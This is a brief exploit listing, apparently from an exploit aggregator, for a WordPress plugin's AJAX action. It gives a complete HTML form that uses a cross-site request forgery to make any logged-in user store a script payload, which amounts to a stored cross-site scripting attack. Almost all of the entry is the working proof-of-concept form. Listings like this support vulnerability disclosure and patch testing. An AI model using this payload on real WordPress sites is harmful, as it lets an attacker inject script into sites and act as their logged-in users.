Share 
## https://sploitus.com/exploit?id=WPEX-ID:7F43CB8E-0C1B-4528-8C5C-B81AB42778DC
Open a page containing the HTML code below as any authenticated user, or make any authenticated user open it via a CSRF attack

<form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="SBF_DB_code_manage_action">
    <input type="text" name="B_COMMAND" value="ADD">
    <input type="text" name="B_PARAM" value="10">
    <input type="text" name="B_PARAM2" value="<script>alert(/XSS/)</script>">
    <input type="text" name="B_PARAM3" value="1">
    <input type="submit" name="submit" value="submit">
</form>